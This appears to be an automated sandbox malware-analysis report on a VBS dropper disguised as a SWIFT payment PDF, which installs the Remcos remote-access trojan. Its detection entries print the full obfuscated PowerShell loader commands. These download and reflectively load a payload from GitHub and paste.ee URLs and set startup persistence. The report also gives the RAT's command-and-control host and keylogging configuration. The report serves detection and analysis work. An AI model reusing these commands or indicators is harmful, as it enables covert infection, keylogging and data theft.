            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.
            Sigma detected: Conhost Spawned By Uncommon Parent Process
            Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: svchost.exe, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 6516, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 2316, ProcessName: conhost.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 1988, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: svchost.exe, ProcessId: 6516, ProcessName: svchost.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", CommandLine|base64offset|contains: M, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", ProcessId: 3032, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5996, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')'), ProcessId: 1076, ProcessName: powershell.exe
            Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJys
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 1988, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: svchost.exe, ProcessId: 6516, ProcessName: svchost.exe

            Stealing of Sensitive Information

            barindex
            Sigma detected: Remcos
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 1988, TargetFilename: C:\ProgramData\remcos\logs.dat

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-04T11:33:52.342098+020020204231Exploit Kit Activity Detected188.114.97.3443192.168.2.549718TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-04T11:33:52.342098+020020204251Exploit Kit Activity Detected188.114.97.3443192.168.2.549718TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-04T11:33:28.433120+020020365941Malware Command and Control Activity Detected192.168.2.55603764.188.16.15723782TCP
            2024-10-04T11:34:14.382305+020020365941Malware Command and Control Activity Detected192.168.2.55539664.188.16.15723782TCP
            2024-10-04T11:34:36.751048+020020365941Malware Command and Control Activity Detected192.168.2.55559464.188.16.15723782TCP
            2024-10-04T11:34:59.536187+020020365941Malware Command and Control Activity Detected192.168.2.55582164.188.16.15723782TCP
            2024-10-04T11:35:21.954618+020020365941Malware Command and Control Activity Detected192.168.2.55592464.188.16.15723782TCP
            2024-10-04T11:35:44.377583+020020365941Malware Command and Control Activity Detected192.168.2.55599364.188.16.15723782TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-04T11:33:52.166114+020028410751Malware Command and Control Activity Detected192.168.2.549718188.114.97.3443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "ab9001.ddns.net:23782:1", "Assigned name": "OCTOBERS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "VLC.exe", "Startup value": "Rmc", "Hide file": "Disable", "Mutex": "Chrorne-K04X5E", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Multi AV Scanner detection for domain / URL
            Source: ab9001.ddns.netVirustotal: Detection: 15%Perma Link
            Source: ab9001.ddns.netVirustotal: Detection: 15%Perma Link
            Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtVirustotal: Detection: 6%Perma Link
            Source: https://paste.ee/d/XlUYO/0Virustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for submitted file
            Source: SWIFT 103 202406111301435660 110624-pdf.vbsVirustotal: Detection: 8%Perma Link
            Yara detected Remcos RAT
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.1587080.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,10_2_004315EC
            Source: powershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_8acd3056-1
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49710 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:55748 version: TLS 1.2
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2452048534.00007FF848F10000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 0000000A.00000002.3372031467.0000000003E07000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371896205.0000000003DE7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369020881.00000000017F7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3368884407.00000000017D7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369228393.0000000001817000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371223912.0000000003C17000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3365846362.000000000160D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369907373.0000000003127000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3364606338.0000000001537000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371787930.0000000003DC7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371439220.0000000003C37000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3368577514.00000000017B7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371561302.0000000003C57000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3364223051.0000000001512000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2324999391.00000000029C2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000011.00000002.2401038340.0000000002882000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000017.00000002.2498372356.0000000002AC2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000001F.00000002.2602124639.0000000002A62000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000025.00000002.2696343691.0000000002E82000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000002C.00000002.2771398420.00000000027B2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000032.00000002.2867044582.00000000025E2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000038.00000002.2943823106.0000000002D22000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000003E.00000002.3041192141.0000000002722000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000044.00000002.3147242188.0000000002D02000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000004A.00000002.3224086435.0000000002A32000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000050.00000002.3314541028.0000000002E32000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000056.00000002.3360669578.00000000032E2000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
